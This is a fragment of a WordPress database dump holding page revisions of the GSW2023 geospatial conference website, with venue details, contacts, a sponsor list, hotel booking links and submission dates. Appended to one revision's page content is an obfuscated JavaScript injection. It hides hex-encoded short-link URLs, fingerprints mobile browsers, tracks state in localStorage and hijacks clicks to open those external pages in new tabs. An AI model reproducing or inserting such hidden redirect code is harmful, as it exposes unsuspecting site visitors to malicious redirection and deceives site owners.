img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-01 08:46:10','2023-06-01 08:46:10','',3066,'https://gsw2023.com/?p=4602',0,'revision','',0),
(4603,1,'2023-06-01 08:46:26','2023-06-01 08:46:26','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609131736{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685608624099{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner 